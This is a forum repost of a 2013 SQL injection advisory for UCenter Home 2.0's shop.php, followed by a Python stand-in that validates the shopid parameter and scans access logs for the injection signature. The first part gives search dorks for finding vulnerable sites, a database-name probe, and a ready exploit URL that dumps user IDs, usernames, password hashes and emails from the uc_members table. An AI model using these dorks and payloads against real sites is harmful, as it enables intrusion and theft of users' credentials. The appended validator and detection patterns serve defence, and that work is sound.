China Network Penetration Testing Alliance

Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

Author: admin    Time: 2013-2-27 21:31
Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers

*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home

Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerable Style : SQL Injection (MySQL Error Based)

Need Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okey.

Your edit DB `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okey.

You use hex conversion, and edit your SQL injection exploit..

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
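The post above boils down to one defect: the integer `shopid` parameter of `shop.php` is placed into a MySQL query without validation, and the MySQL error-based trick (`floor(rand(0)*2)` with `GROUP BY` over `information_schema`) reads data back through the error message. The script below is an added example, not part of the original post and not UCenter Home's own code (the real application is PHP; this is a Python stand-in). It shows the two defender-side pieces: a hardened view handler that accepts only a plain decimal `shopid` and binds it as a parameter, and a log scanner that flags the error-based signature in access-log lines. The `shops` table, the log lines, timestamps and IP addresses are constructed; the URL-encoded query in the second log line is the database-name probe quoted in the post.

```python
import re
import sqlite3
import urllib.parse

# Signatures of the error-based extraction technique quoted in the post:
# floor(rand(0)*2) grouped over information_schema, 0x7e/0x27 framing of the
# extracted value, and the database() probe used to learn the schema name.
SIGNATURES = {
    "floor_rand_groupby": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"\binformation_schema\.\w+", re.I),
    "hex_delimiters": re.compile(r"concat\s*\(\s*0x7e\s*,\s*0x27", re.I),
    "database_probe": re.compile(r"unhex\s*\(\s*hex\s*\(\s*database\s*\(\s*\)", re.I),
}


def parse_shopid(raw):
    """Accept only a plain decimal string (at most 10 digits); anything else,
    including '253 and(select ...)', is rejected instead of being coerced."""
    if raw is None or not re.fullmatch(r"\d{1,10}", raw.strip()):
        return None
    return int(raw.strip())


def build_demo_db():
    """Constructed in-memory stand-in for the shop table (not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE shops (shopid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO shops VALUES (?, ?)", [(252, "books"), (253, "tools")])
    return conn


def view_shop(conn, raw_shopid):
    """Hardened handler: validate first, then bind the value as a query parameter
    so the database never sees attacker-controlled SQL text."""
    shopid = parse_shopid(raw_shopid)
    if shopid is None:
        return None
    return conn.execute(
        "SELECT shopid, name FROM shops WHERE shopid = ?", (shopid,)
    ).fetchone()


def classify_request(request_line):
    """Return the signature names matched by the URL-decoded query string of a
    combined-format access-log line; [] when nothing matches."""
    m = re.search(r'"(?:GET|POST)\s+(\S+)', request_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    decoded = urllib.parse.unquote_plus(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines):
    """Return (line_index, matched_signatures) for every line that carries the
    error-based injection pattern."""
    hits = []
    for i, line in enumerate(lines):
        names = classify_request(line)
        if names:
            hits.append((i, names))
    return hits


# Constructed access-log lines: a normal view, then the database-name probe
# from the post, URL-encoded as a browser or tool would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Feb/2013:21:31:00 +0800] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Feb/2013:21:32:10 +0800] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from'
    '(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))'
    '%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables'
    '%20group%20by%20x)a)%20and%201=1 HTTP/1.1" 500 812',
]


if __name__ == "__main__":
    db = build_demo_db()
    print("clean request ->", view_shop(db, "253"))
    print("injected request ->", view_shop(db, "253 and 1=1"))
    for idx, names in scan_log(SAMPLE_LOG):
        print(f"log line {idx}: {', '.join(names)}")
```

The validator deliberately mirrors what a strict `intval()` check plus a prepared statement would give in PHP: the injected string never reaches the database, so the error-based channel has nothing to leak. The scanner decodes the query string before matching, because the payload in the post only appears in its readable form after `%20` and friends are unquoted; a 500 status next to a match is the sign that the database actually raised the error the technique depends on.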




Welcome to the China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2